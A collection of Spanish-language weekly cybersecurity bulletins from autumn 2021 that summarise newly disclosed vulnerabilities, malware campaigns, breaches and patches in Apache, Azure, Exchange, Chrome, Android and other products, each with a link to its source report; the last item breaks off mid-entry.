Vulnerabilidades en Apache activamente explotadas A principios de esta semana, Apache corregía un 0-day (CVE-2021-41773) que afectaba a los servidores HTTP de Apache y que estaba siendo explotado activamente. Sin embargo, el jueves conocíamos que el parche publicado sobre la versión 2.4.50 fue insuficiente, dando lugar a una nueva vulnerabilidad, ya que un agente amenaza remoto puede seguir aprovechando el ataque de Path Traversal para mapear direcciones URL con ficheros fuera del directorio raíz del servidor web a través de directivas Alias-like. Además, sería también posible la ejecución remota de código si en dichos caminos o rutas con alias se han habilitado scripts CGI. Esta nueva vulnerabilidad, identificada como CVE-2021-42013 afecta a las versiones 2.4.49 y 2.4.50 y está siendo también activamente explotada. Desde Apache lanzaban una corrección para la nueva vulnerabilidad en la versión 2.4.51. Asimismo, CISA ha realizado una publicación instando a las organizaciones a aplicar los parches lo antes posible, ya que se están observando escaneos de forma masiva para aprovechar estos fallos. Más detalles: https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html Vulnerabilidad en Azure AD permite ataques de fuerza bruta Investigadores de seguridad de Secureworks han publicado el descubrimiento de una nueva vulnerabilidad en Microsoft Azure. Este fallo, que todavía no ha sido corregido por Microsoft, podría permitir a agentes amenaza realizar ataques de fuerza bruta contra el Directorio Activo de Azure sin ser detectados, ya que no se generarían eventos de inicio de sesión en el tenant de la compañía víctima. El fallo reside en la característica Seamless Single Sign-On (SSO) de Azure, que permite a los usuarios iniciar sesión automáticamente sin tener que introducir las credenciales. Sin embargo, la explotación de este fallo no se limita solo a las organizaciones que utilicen Seamless SSO. Desde Microsoft han comunicado a los investigadores que se estarían mejorando las características de Seamless SSO para mitigar la vulnerabilidad. A raíz de conocerse la vulnerabilidad, ya se han publicado en GitHub algunas pruebas de concepto para explotar el fallo. Toda la info: https://www.secureworks.com/research/undetected-azure-active-directory-brute-force-attacks Syniverse sufre accesos no autorizados en sus sistemas durante años El pasado mes de septiembre, la compañía Syniverse señaló ante la Comisión Nacional de Mercado de Valores norteamericana haber descubierto en mayo del presente año haber sufrido un incidente de seguridad que afectó a su entorno de transferencias EDT mediante un acceso no autorizado a bases de datos internas en varias ocasiones desde el año 2016. Desde la propia empresa, indicaban que el incidente no llegó a afectar a su funcionamiento y que no se produjo ningún intento de extorsión. Desde el medio Motherboard han publicado un artículo donde tratan de evaluar el posible alcance real de estos hechos, destacando que Syniverse ofrece servicios a más de 300 compañías del sector de las telecomunicaciones, como AT&T, Verizon o T-Mobile. Además, en su artículo añaden que un exempleado de la compañía habría informado que los sistemas afectados contenían acceso a metadatos de registros de llamadas, datos de las personas, números de teléfono, ubicaciones, así como contenido de los mensajes de texto SMS. Según el investigador de seguridad, Karsten Nohl, Syniverse tendría acceso a la comunicación de miles de millones de personas de todo el mundo y estos hechos supondrían una afectación grave a la privacidad de los usuarios. Según el medio digital, desde Syniverse no se ha querido pronunciar a preguntas específicas sobre el alcance real de afectación. Para saber más: https://www.vice.com/amp/en/article/z3xpm8/company-that-routes-billions-of-text-messages-quietly-says-it-was-hacked Extraen 950GB de datos de un C2 de Agent Tesla Investigadores de Resecurity, en colaboración con diversos ISP de la Unión Europea, Oriente Medio y América del Norte, habrían logrado exfiltrar 950GB de información de un servidor Command & Control (C2) del RAT Agent Tesla, activo desde finales de 2014 y conocido por el compromiso de información sensible mediante campañas de malspam. Tras el análisis de la información, habrían localizado credenciales de usuario y archivos confidenciales, entre otros, permitiendo a los investigadores establecer patrones de uso de Agent Tesla por los agentes amenaza. Entre estos patrones destacan la distribución geográfica de las víctimas, localizando regiones más afectadas como Estados Unidos, Canadá, Italia, España, Chile o Egipto, así como sectores más aquejados por este RAT, entre los que se encuentran el sector financiero, el retail y el gubernamental. Conforme exponen diferentes investigadores de seguridad que habrían estado haciendo un seguimiento de este malware, Agent Tesla seguirá siendo una amenaza para entornos Windows, sobre todo tras observarse que la nueva versión del RAT estaría atentando contra la interfaz ASMI de Microsoft para evitar ser detectado y alargar los tiempos de infección. Todos los detalles: https://securityaffairs.co/wordpress/123039/malware/agent-tesla-c2c-dumped.html TangleBot - Nuevo malware para Android Investigadores de seguridad de Proofpoint han descubierto un nuevo malware para dispositivos móviles Android, que han bautizado como TangleBot y que de momento estaría dirigido a usuarios en Estados Unidos y Canadá. Este malware se distribuye mediante campañas de smishing donde se simula el envío de regulaciones sobre la COVID-19 o información relacionada con posibles cortes de energía. En los SMS se incita a las víctimas a hacer clic en un enlace que les solicita una actualización de Adobe Flash y se les invita a descargar la supuesta actualización. Lo que realmente se acaba instalando es ya TangleBot, un malware que otorga a los atacantes el control total de los dispositivos, lo que les permite monitorizar y registrar las actividades del usuario, activar un keylogger para interceptar todas las contraseñas tecleadas o también almacenar sin el conocimiento del usuario el audio y video usando el micrófono y la cámara del dispositivo. Además de sus capacidades de espionaje y registro de teclas, el malware puede bloquear y realizar llamadas, lo que provoca la posibilidad de que se habiliten otro tipo de servicios premium. Info completa: https://www.proofpoint.com/us/blog/threat-insight/mobile-malware-tanglebot-untangled
8 de octubre de 2021
Boletín semanal de ciberseguridad 25 septiembre - 1 octubre
Expira un certificado raíz de Let’s Encrypt (DST Root CA X3) Hace unos días, Scott Helme, fundador de Security Headers, destacaba la fecha del 30 de septiembre como fecha en que el certificado raíz de Let’s Encrypt, DST Root CA X3, expiraría. A partir de las 16:01 hora española de ayer 30 de septiembre, al caducar el certificado raíz existente en múltiples sitios web, todos aquellos dispositivos y navegadores que no han sido actualizados (y para los que, por tanto, el certificado dejó de ser compatible) comenzaron a experimentar problemas al considerar las conexiones como no confiables. En su artículo, Helme facilitaba un listado de clientes que sólo confiaban en el certificado que iba a caducar y que por tanto, iban a experimentar problemas a partir de la caducidad: “OpenSSL <= 1.0.2, Windows < XP SP3, macOS < 10.12.1, iOS < 10 (iPhone 5 is the lowest model that can get to iOS 10), Android < 7.1.1 (but >= 2.3.6 will work if served ISRG Root X1 cross-sign), Mozilla Firefox < 50, Ubuntu < 16.04, Debian < 8, Java 8 < 8u141, Java 7 < 7u151, NSS < 3.26 y Amazon FireOS (Silk Browser)”. Para evitar este problema, desde Let’s Encrypt cuentan con un nuevo certificado raíz, ISRG Root X1. Por otro lado, también cabe destacar que, hasta el día de ayer, la firma empleaba un sistema de identificación cruzada que hacía compatible DST Root CA X3 con la versión más reciente y extendida de ISRG Root X1, sin embargo, con la expiración del primero, se pone fin a esta práctica. A raíz de la expiración y a pesar de los avisos realizados, Helme habría confirmado problemas, al menos, para firmas como Palo Alto, Bluecoat, Cisco Umbrela, Catchpoint, Guardian Firewall, Monday.com, PFsense, Google Cloud Monitoring, Azure Application Gateway, OVH, Auth0, Shopify, Xero, QuickBooks, Fortinet, Heroku, Rocket League, InstaPage, Ledger, Netlify y Cloudflare Pages. Más detalles: https://www.zdnet.com/article/fortinet-shopify-others-report-issues-after-root-ca-certificate-from-lets-encrypt-expires/ Chrome corrige nuevos 0-day explotados de manera activa El 24 de septiembre, Google lanzaba una actualización urgente de su navegador Chrome para Windows, Mac y Linux que soluciona un 0-day del que el propio fabricante afirma tener reportes de su explotación activa en la red por parte de actores amenaza, si bien no ha facilitado detalles concretos sobre los supuestos incidentes. El fallo, identificado como CVE-2021-37973 (por el momento sin score CVSSv3), reside en el nuevo sistema de navegación de Google para Chrome denominado “Portals” y se trata de un fallo del tipo “use after free” (uso de memoria previamente liberada) que, tras una explotación exitosa en versiones de Chrome vulnerables, permitiría la ejecución de código arbitrario. Google ya tiene lista la nueva versión de Chrome 94.0.4606.61 que soluciona el problema y, según afirman en su propia publicación, “se implementará en los próximos días/semanas”. Tan solo unos días más tarde, el 30 de septiembre, Google volvía a lanzar una actualización urgente de su navegador Chrome para Windows, Mac y Linux solucionando dos nuevos 0-day de los que aún no ha facilitado detalles concretos, quedando reservados hasta la implementación masiva del parche. Estas vulnerabilidades, las cuales están siendo explotadas activamente según Google, han sido designadas como: CVE-2021-37975, un fallo de uso de la memoria tras su liberación en el motor V8 de JavaScript y WebAssembly (use-after-free), que permitiría el bloqueo del programa y la ejecución de código arbitrario; CVE-2021-37976 que produce una fuga de información en el núcleo del navegador. Google ya tiene lista la nueva versión de Chrome 94.0.4606.71 que soluciona el problema con planes de que los usuarios la implementen mayoritariamente durante los próximos días. Toda la info: https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html Guía de buenas prácticas para la selección y refuerzo de redes VPN La Agencia de Seguridad Nacional (NSA) y la Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. (CISA) han creado y publicado un documento de forma conjunta bajo el título Selecting and Hardening Remote Access VPN Solutions que tiene como principal finalidad prestar ayuda a las organizaciones a la hora de elegir una solución VPN que siga los estándares actuales, así como la definición de una serie de buenas prácticas para hacer uso de credenciales de autenticación sólidas, agilidad para parchear vulnerabilidades e implementar procesos para proteger y monitorizar los accesos hacia y desde la red privada virtual (VPN). La publicación de esta guía se ha producido tras los numerosos ataques acontecidos contra instituciones gubernamentales y de defensa de varios países durante este año por parte de actores amenaza, principalmente respaldados por gobiernos, y diferentes grupos de ransomware que han aprovechado vulnerabilidades conocidas en servicios VPN de uso extendido como Fortinet, Pulse Secure o Cisco. El documento ya está disponible de forma pública desde el siguiente enlace y, tal y como indica la propia NSA en su comunicado de prensa, “La publicación de la guía es parte de su misión de ayudar a proteger a los departamentos de defensa y seguridad nacional”. Para saber más: https://us-cert.cisa.gov/ncas/current-activity/2021/09/28/cisa-and-nsa-release-guidance-selecting-and-hardening-vpns Malware GriftHorse para dispositivos Android suscribe a servicios de pago Investigadores de seguridad de Zimperium han descubierto un nuevo troyano distribuido a gran escala desde noviembre de 2020, que suscribe a las víctimas a servicios de SMS premium. Hasta la fecha habría infectado a más de 10 millones de dispositivos Android en más de 70 países. La distribución del malware se realiza a través de aplicaciones con aspecto legítimo de herramientas, software de personalización o entretenimiento, subidas a la tienda oficial Google Play Store y en tiendas de terceros. El malware está desarrollado con el framework Apache Cordova, haciéndolo multiplataforma y permitiendo desplegar actualizaciones sin necesidad de interacción del usuario. La aplicación muestra de manera repetitiva alertas con pretextos de premios para redirigir a la víctima a una web en su idioma en la que, al introducir su número de teléfono, queda suscrito a un servicio premium de SMS con un coste mensual superior a los 30€. Cabe destacar que el malware emplea varias técnicas para evitar la detección: evita codificar las URLs, no reutiliza dominios, filtra el contenido en función de la geolocalización de la dirección IP y evade la comprobación del análisis dinámico de la comunicación. Los investigadores estiman que los autores del troyano tienen beneficios mensuales entre 1,2 y 3,5 millones de euros. Más: https://blog.zimperium.com/grifthorse-android-trojan-steals-millions-from-over-10-million-victims-globally/
1 de octubre de 2021
Boletín semanal de ciberseguridad 18-24 septiembre
Campaña de malware utilizando TeamViewer en webs bajo IIS Investigadores de Malwarebytes han observado una campaña de distribución de malware desde principios de septiembre que hace uso de páginas previamente vulneradas bajo el funcionamiento del servidor web de Microsoft, Internet Information Services (IIS). El vector de ataque consiste en mostrar una alerta falsa de certificado caducado del tipo "Detected a potential security risk and has not extended the transition to [sitename]. Updating a security certificate may allow this connection to succeed. NET::ERR_CERT_OUT_OF_DATE." que, a su vez, sugiere al usuario la descarga de un “instalador de actualizaciones” malicioso que, en realidad ofusca el conocido troyano TVRAT. Una vez que la víctima ejecuta el software malicioso se instalará junto al software de control remoto TeamViewer, otorgando al actor amenaza una comunicación directa con su servidor de command and control y un control total sobre el equipo comprometido. Hasta la fecha, no se conocen con exactitud los métodos específicos utilizados para comprometer servidores IIS, si bien existen diferentes códigos de explotación disponibles que la propia Microsoft parcheó el pasado mes de mayo (CVE-2021-31166). Más info: https://www.bleepingcomputer.com/news/security/hacked-sites-push-teamviewer-using-fake-expired-certificate-alert/ BulletProofLink: campaña masiva de phishing Investigadores de seguridad de Microsoft han publicado los detalles de una campaña masiva de phishing como servicio (PHaaS) que utiliza una infraestructura similar a la de un hosting y ofrece diferentes servicios a los actores amenaza, tales como kits y plantillas de phishing. Según indican las investigaciones, BulletProofLink, que así se denomina esta campaña, va más allá de los tradicionales kits de phishing, esto se debe a que tras un registro inicial en su portal previo pago de 800$, ofrece un servicio integral con servicio de hosting, generación de dominios, envío de correos electrónicos, recopilación de credenciales e inicios de sesión sustraidos y que, posteriormente, puede ir evolucionando con modificaciones de las plantillas de phishing de entre las más de 120 que tienen disponibles. No obstante, Microsoft ya ha advertido de que los operadores de BulletProofLink engañan a sus propios clientes almacenando las credenciales sustraídas en los ataques materializados para acabar vendiéndolas en otros foros underground. Se calcula que la campaña ha llegado a utilizar hasta la fecha más de 300 mil subdominios únicos de reciente creación, lo que evidencia la magnitud del impacto de esta campaña. Todos los detalles: https://www.microsoft.com/security/blog/2021/09/21/catching-the-big-fish-analyzing-a-large-scale-phishing-as-a-service-operation/ Fallo en Autodiscover de Microsoft Exchange permite exfiltrar credenciales Amit Serper, ingeniero de seguridad en Guardicore, ha descubierto un fallo de implementación en el protocolo Autodiscover de Microsoft Exchange el cual podría permitir la exfiltración de credenciales. Autodiscover es un protocolo que utiliza Microsoft Exchange para proveer a sus clientes de una forma sencilla y automática de configuración del cliente Exchange y sus diferentes aplicaciones, como Outlook, en su infraestructura. Una vez instalado, el proceso normal es que la aplicación solicite el nombre de usuario y contraseña para proceder de forma automática a configurar el cliente, intentando crear una URL de detección automática (Autodiscover.TLD) basada en la dirección de correo facilitada por el usuario. En caso de que ninguna de las URLs autogeneradas responda, se inicia una fase de retroceso que tiende siempre a fallar debido a que intenta resolver la parte automática del dominio (Autodiscover.TLD), viendo que quien sea propietario del dominio Autodiscover.TLD recibiría todas las peticiones que no lleguen al dominio original. Para probar el fallo, Serper y su equipo compraron diferentes dominios de detección automática con diferentes TLDs, recibiendo peticiones de gran cantidad de clientes de múltiples sectores. Tras las pruebas realizadas, Guardicore habría conseguido más de 90.000 credenciales únicas provenientes de varias aplicaciones como Outlook y más de 350.000 credenciales de dominio de Windows, determinado que la afectación es global. Más: https://www.guardicore.com/labs/autodiscovering-the-great-leak/ Nueva vulnerabilidad 0-day en Apple explotada en dispositivos iOS y macOS Investigadores de seguridad de Google han informado a Apple de una nueva vulnerabilidad 0-day que afecta a dispositivos iOS y macOS. Además, la propia Apple ha reconocido que este fallo puede estar siendo explotado activamente en la red por actores amenaza. En concreto, la vulnerabilidad se localiza en el kernel del sistema operativo XNU, que ha sido registrada bajo la denominación CVE-2021-30869 y por el momento no tiene asignada criticidad bajo la escala CVSSv3. Sin embargo, hay que tener en cuenta que se trata de un fallo que puede llevar a la ejecución de código arbitrario en un dispositivo comprometido, por lo que su criticidad en cualquier caso se considera alta. Hay que tener en cuenta que sólo durante este año 2021, Apple ya ha tenido que resolver más de 10 vulnerabilidades 0-day. En este caso, los correspondientes parches que solucionan el problema ya están disponibles para los siguientes dispositivos afectados: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, iPod touch (6ª generación) con iOS 12.5.5 y Mac con la actualización de seguridad 2021-006 Catalina. Toda la info: https://support.apple.com/en-us/HT212824
24 de septiembre de 2021
Boletín semanal de ciberseguridad 11-17 septiembre
S.O.V.A. – Nuevo troyano bancario para Android Investigadores de Threat Fabric han descubierto la existencia, al menos desde principios del mes de agosto, de un nuevo troyano bancario para Android al que han denominado S.O.V.A., cuyo objetivo principal sería la recopilación de información personal identificable (PII) de las víctimas. Se trata de un troyano que contiene funcionalidades habituales en este tipo de malware como son la capacidad de realizar ataques de superposición, keylogging o manipulación de notificaciones; pero que también incluye otras funcionalidades menos comunes, como el robo de cookies de inicio de sesión, lo que permitiría a los atacantes tener acceso a inicios de sesión válidos de los usuarios sin necesidad de conocer sus credenciales. Por el momento, el troyano se encuentra en fase de desarrollo, y los autores lo estarían publicitando en foros underground con la intención de poder probarlo en múltiples dispositivos e implementar las mejoras necesarias. Según los investigadores, ya se habrían detectado adaptaciones del malware, disponibles para la suplantación de instituciones bancarias en Estados Unidos y España fundamentalmente, aunque en su anuncio los autores ofrecen la posibilidad de adaptarlo contra otras entidades según necesidades del comprador. Más info: https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html Vermilion Strike: versión no oficial de un Beacon de Cobalt Strike Investigadores de Intezer descubrieron el pasado mes de agosto una versión no oficial de un Beacon de Cobalt Strike para sistemas Linux y Windows. Este Beacon, denominado Vermilion Strike, estaría desarrollado desde cero por agentes amenaza desconocidos, sin compartir código con la versión oficial, y se estaría empleando de forma activa contra organizaciones de todo el mundo. Vermilion Strike utiliza el mismo protocolo que Cobalt Strike para conectarse a los servidores de Command and Control y tiene capacidades de acceso remoto como subir archivos, ejecutar comandos y modificar archivos. Esta amenaza llevaría en activo desde agosto y estaría siendo utilizada en ataques dirigidos contra empresas de telecomunicaciones, agencias gubernamentales, tecnológicas e instituciones financieras de todo el mundo. El objetivo final de los mismos parece enfocarse a labores de ciberespionaje. Más info: https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/ Operación Harvest: campaña de ciberespionaje de larga duración Investigadores de McAfee han publicado el análisis de una operación de larga duración a la que han denominado “Harvest”. El hallazgo de esta actividad comenzó con el análisis de un incidente de malware que fue ampliándose hasta configurarse como un ciberataque de gran sofisticación que habría durado varios años. El actor amenaza inició sus incursiones mediante la vulneración de un servidor web de la víctima, generando persistencia e instalando herramientas que serían utilizadas para la recopilación de información, la elevación de privilegios, la realización de movimientos laterales y la ejecución de archivos. Entre las herramientas utilizadas destacan PSexec, Procdump, Mimikatz, RottenPotato y BadPotato. Además de valerse de un arsenal de herramientas bastante amplio, el agente amenaza se sirvió de los malware PlugX y Winnti para escalar privilegios y obtener un backdoor en la infraestructura de la víctima. En base a los análisis realizados, los investigadores estiman que la incursión fue llevada a cabo por un actor de origen chino que comparte vínculos con APT27 y APT41. Su objetivo principal habría sido mantener su presencia dentro de la infraestructura de la víctima para exfiltrar información de inteligencia con fines comerciales o militares. Más info: https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/ Detalles adicionales sobre las campañas de explotación del 0-day en Microsoft MSHTML Investigadores de Microsoft han publicado un análisis detallado de los primeros ataques detectados en los que se habría explotado la vulnerabilidad CVE-2021-40444, así como su potencial atribución. Las primeras campañas se remontan al mes de agosto, con correos electrónicos bajo el pretexto de acuerdos legales o contractuales donde los documentos maliciosos se alojaban en sitos legítimos de intercambio de archivos para la distribución de loaders con beacons de Cobalt Strike. El payload final no era marcado por los sistemas Windows como descargado de una fuente externa, por lo que era ejecutado directamente, sin interacción del usuario, evidenciándose así la explotación de la vulnerabilidad. La autoría de estos ataques iniciales, según Microsoft, apunta a DEV-0365, un grupo en desarrollo bajo el que se agrupa un cluster de actividades fraudulentas asociadas a infraestructura de Cobalt Strike. No obstante, también indican que parte de la infraestructura que alojaba los documentos maliciosos iniciales se puede relacionar con payloads de BazarLoader y Trickbot, actividad asociada al actor amenaza DEV-0193 (también conocido como UNC1878 o Wizar Spider). Pese a estos vínculos con actores genéricos, desde Microsoft han querido diferenciar esta actividad de explotación de la vulnerabilidad a un nuevo grupo denominado DEV-0413, ya que indican que no estaríamos ante campañas genéricas, sino que los correos de phishing estaban muy alineados con las operaciones comerciales de las organizaciones a las que se atacaba. De forma adicional a la investigación de Microsoft, en los últimos días, investigadores de seguridad en Twitter también vienen alertando de la detección de campañas de spam que estarían distribuyendo el troyano Ramint mediante la explotación del mismo fallo. Más info: https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/ OMIGOD: vulnerabilidades en la cadena de suministro en la nube El equipo de investigadores de Wiz han descubierto recientemente una serie de vulnerabilidades en el agente de software Open Management Infrastructure (OMI), integrado en muchos de los productos más populares de Azure. En concreto se trata de cuatro vulnerabilidades catalogadas como CVE-2021-38647 CVSS 9.8, CVE-2021-38648 CVSS 7.8, CVE-2021-38645 CVSS 7.8, y CVE-2021-38649 CVSS 7.0, denominadas conjuntamente como “OMIGOD”. El riesgo está en clientes que utilicen máquinas virtuales Linux en la nube ya que el agente OMI se ejecuta de manera automática y sin el conocimiento de los usuarios al habilitar ciertos servicios en Azure (p.ej: Log Analytics, Diagnostics, Configuration Management, etc.), por ello estas vulnerabilidades en OMI podrían permitir a un posible atacante escalar a privilegios de root y ejecutar código malicioso de manera remota. Microsoft ha lanzado la versión parcheada de OMI 1.6.8.1., por lo que se aconseja su actualización lo antes posible, ya que de acuerdo con los investigadores miles de clientes de Azure y millones de puntos de conexión estarían afectados. Más info: https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution
17 de septiembre de 2021
Boletín semanal de ciberseguridad 4-10 septiembre
Vulnerabilidad crítica en ADSelfService Plus de Zoho La compañía Zoho ha hecho público un aviso de seguridad advirtiendo de la detección de una vulnerabilidad crítica en ADSelfService Plus, software corporativo para la gestión de contraseñas e inicios de sesión. En concreto, la vulnerabilidad consiste en una omisión de autenticación que afecta a las URL de la API REST en ADSelfService Plus, lo que permitiría a un actor amenaza la ejecución remota de código (RCE). La vulnerabilidad ha sido identificada con el CVE-2021-40539 aunque por el momento carece de calificación según CVSSv3. No obstante, diversas fuentes la definen como crítica. Además, tanto la propia organización Zoho como la Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. (CISA) han confirmado que existen evidencias de la explotación activa en la red de este fallo, por lo que se recomienda aplicar en cuanto sea posible las actualizaciones ya lanzadas por Zoho que solucionan el problema en todas las versiones de ADSelfService Plus anteriores a la 6114. Más detalles: https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html Nuevo 0-day en Windows activamente explotado Microsoft ha publicado un aviso de seguridad donde desvela los detalles de una nueva vulnerabilidad de ejecución remota de código en Microsoft MSHTML, la funcionalidad que se encarga del "renderizado" o construcción de documentos web en el navegador ya obsoleto Internet Explorer (IE) pero también en los productos Office. Este fallo, catalogado como CVE-2021-40444 con un nivel de criticidad CVSSv3 8.8, estaría siendo aprovechado por actores amenaza en ataques dirigidos mediante el envío de un documento especialmente diseñado que requiere de la interacción del usuario. Por el momento, no existen parches para solventarlo, pero sí medidas mitigatorias mediante la desactivación de nuevos controles ActiveX en IE. Cabe señalar asimismo que según indica Microsoft, el ataque queda desestimado si se mantiene la configuración por defecto de Office donde se incluye la "vista protegida". Por su parte, investigadores de seguridad afirman haber localizado documentos maliciosos de Word utilizados en ataques, obteniendo más información sobre su explotación y confirmando que su criticidad es mayor a la inicialmente pensada. También han comprobado que la vista protegida que por defecto Office aplica a los archivos descargados de internet (MotW) no está habilitada si, por ejemplo, el documento malicioso está incluido en un archivo zip o iso, o bien se trata de un documento RTF. Por el momento, no está claro si el próximo martes 14 de septiembre habrá algún parche oficial por parte de Microsoft que solucione esta vulnerabilidad, por lo que se recomienda encarecidamente aplicar las medidas de mitigación descritas y no abrir archivos adjuntos que no sean de una fuente fiable. Para saber más: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 0-day en Ghostscript permite comprometer servidores El investigador de seguridad vietnamita, Nguyen The Duc, publicó el pasado domingo una prueba de concepto (PoC) para una vulnerabilidad 0-Day de Ghostscript sin parchear. Este exploit, publicado en Github, y para el que ya se ha confirmado su funcionamiento, supone un riesgo para todos los servidores que utilizan este componente. Ghostscript es una pequeña librería que permite a las aplicaciones procesar documentos PDF y archivos basados en PostScript. Aunque su uso es más habitual en software de escritorio, también se suele utilizar en servidores, donde se incluye junto con herramientas de conversión de imágenes y procesamiento de carga de archivos, como ImageMagick. La prueba de concepto publicada aprovecharía este segundo escenario, permitiendo a posibles atacantes cargar un archivo SVG alterado que evita el procesamiento de imagen y ejecuta código malicioso en el sistema. Cabe destacar que este 0-day fue descubierto el año pasado por el investigador Emil Lerner, sin embargo, no fue de dominio público hasta el mes pasado, cuando se presentó en una conferencia de seguridad. Información completa: https://therecord.media/ghostscript-zero-day-allows-full-server-compromises/ Explotación de ProxyShell para desplegar el ransomware Conti Una nueva investigación por parte de Sophos ha desvelado que los operadores del ransomware Conti habrían añadido a su arsenal el aprovechamiento de las recientes vulnerabilidades en Microsoft Exchange que conforman la cadena de explotación conocida como ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). Pese a que la técnica ya fue utilizada como vector de acceso por el ransomware LockFile hace apenas unas semanas, en las incursiones que despliegan Conti se observa una mejora en las técnicas que permiten el compromiso completo de la red en apenas cinco días. Tan solo un minuto después de lograrse la explotación de ProxyShell los atacantes ya disponen de una webshell remota, en cuatro horas han obtenido las credenciales de administrador de dominio y en 48 horas ya han exfiltrado 1TB de información confidencial. En total, a lo largo de una incursión, se observó la instalación de hasta siete puertas traseras (web shells, Cobalt Strike y herramientas comerciales como Altera o Splashtop) para mantener el acceso al entorno comprometido. Para saber más: https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/
10 de septiembre de 2021
Boletín semanal de ciberseguridad 28 agosto - 3 septiembre
PoC disponible y escaneos detectados para RCE en Confluence El pasado miércoles 25 de agosto, Confluence publicaba un aviso de seguridad para alertar de una vulnerabilidad en Confuence Server y Data Center en versiones anteriores a las 6.13.23, 7.4.11, 7.11.6, 7.12.5 y 7.13.0. En su aviso, la firma aclaraba que el fallo no afectaba a los clientes de Confluence Cloud. La vulnerabilidad, que ha recibido el identificador CVE-2021-26084 y un CVSS de 9.8, es en concreto una vulnerabilidad de inyección de OGNL (Object-Graph Navigation Language) que permitiría a un usuario autenticado, y en algunos casos incluso a un usuario no autenticado, ejecutar código arbitrario en una instancia de Confluence Server o Data Center. Tan sólo unos días más tarde, el domingo 29 de agosto, algunos investigadores de seguridad anunciaban haber conseguido ejecutar código de forma remota sin autenticarse de forma relativamente sencilla, pero no hacían públicos aún los detalles de la PoC, hecho que retrasaban unos días hasta ayer 1 de septiembre. A pesar de no hacerse pública la PoC inicialmente, el 31 de agosto ya comenzaba a alertarse de la detección de escaneos masivos de servidores Confluence vulnerables. Más detalles: https://therecord.media/confluence-enterprise-servers-targeted-with-recent-vulnerability/ ChaosDB - Vulnerabilidad crítica en Microsoft Azure Cosmos DB Investigadores de seguridad de Wiz han encontrado una vulnerabilidad crítica en Azure, la plataforma en la nube de Microsoft, que permitiría la toma de control de forma remota y con derechos de administrador, de cuentas de la base de datos Cosmos DB. Debido a la gravedad de la vulnerabilidad, los investigadores no han publicado todos los detalles técnicos y los medios para explotarlo, aunque sí detallan que ChaosDB se produciría a partir de la explotación encadenada de una serie de vulnerabilidades encontradas en la función Jupyter Notebook de Cosmos DB. Aprovechando estas vulnerabilidades, un actor malicioso podría obtener credenciales relacionadas con las cuentas de Cosmos DB objetivo, de Jupyter Notebook y de la cuenta de Jupyter Notebok Storage. Con estas credenciales, el atacante podrá ya ver, modificar y eliminar datos en la cuenta de Cosmos DB. En su artículo, Wiz habría incluido un vídeo en el que muestran la explotación de los fallos indicados. Por parte de Microsoft, corregía el fallo el pasado 12 de agosto, menos de 48 horas después de ser alertados desde Wiz, y unos días más tarde, el 26 de agosto, notificaba mediante un aviso enviado aproximadamente a un 30% de los clientes de Cosmos DB de la potencial brecha de seguridad. En su aviso, Microsoft indicaba no tener constancia de la explotación de la vulnerabilidad, pero aconsejaba regenerar las claves primarias como medida de seguridad. Por su parte Wiz indica que el volumen de clientes potencialmente afectados en su opinión es mayor al que habría alertado Microsoft, y recomiendan a todos los clientes adoptar las medidas de seguridad recomendadas. Toda la info: https://chaosdb.wiz.io/ ProxyToken – Nueva vulnerabilidad en Microsoft Exchange Investigadores de seguridad de Zero Day Initiative han publicado los detalles técnicos sobre una vulnerabilidad grave en Microsoft Exchange Server denominada ProxyToken. El fallo, catalogado con el identificador CVE-2021-33766 y que ha recibido un CVSSv3 de 7.3, es en concreto una vulnerabilidad de divulgación de información que podría revelar la información personal de las víctimas o datos sensibles de la empresa, entre otros. Microsoft Exchange utiliza dos sitios web: el front-end, al que se conectan los usuarios para acceder al correo electrónico, y que funciona en gran medida como un proxy para el back-end, al que pasa las solicitudes de autenticación. El problema actualmente identificado surge en una función llamada DelegatedAuthModule, donde el front-end pasa las solicitudes de autenticación, que contienen una cookie SecurityToken que las identifica, directamente al back-end. Cuando el front-end recibe una solicitud de autenticación con la cookie SecurityToken, sabe que el back-end es el único responsable de autenticar esta solicitud. Sin embargo, el back-end desconoce por completo que necesita autenticar algunas solicitudes entrantes basadas en la cookie SecurityToken, ya que DelegatedAuthModule no se carga en instalaciones que no han sido configuradas para usar la función especial de autenticación delegada. El resultado final es que las solicitudes pueden pasar, sin ser sometidas a autenticación en el front-end o en el back-end. Microsoft abordó el problema como parte de sus actualizaciones del mes de julio, y recomienda a todos los administradores de los servidores de Exchange que no hayan instalado los parches correspondientes priorizar esta tarea. Para saber más: https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server BrakTooth: vulnerabilidades que afectan a dispositivos Bluetooth El equipo de investigadores de ASSET ha publicado un total de 16 avisos de seguridad, en los que aborda 20 vulnerabilidades que afectan a la pila de software Bluetooth de placas System-on-Chip (SoC) de once proveedores diferentes. Se estima que los dispositivos afectados rondarían los miles de millones, entre los que se encontrarían dispositivos móviles, equipos informáticos o tablets, entre otros. Según los investigadores, la explotación de estos fallos de seguridad podría permitir realizar ataques de denegación de servicio o ejecutar código malicioso, aunque el impacto sería diferente según el modelo de placa SoC y pila de software Bluetooth utilizado. Entre las vulnerabilidades identificadas destaca la CVE-2021-28139, que permite ejecutar código remoto en dispositivos con placas ESP32 SoC de Espressif Systems a través de paquetes LMP de Bluetooth. Por el momento, únicamente tres de los proveedores afectados han lanzado parches: Espressif Systems, Infineon y Bluetrum. Otros como Intel, continúan trabajando en esta cuestión y alguno como Texas Instruments ha indicado que no abordará esta cuestión o Qualcomm, que únicamente trabajará en una parte de estas. Información completa: 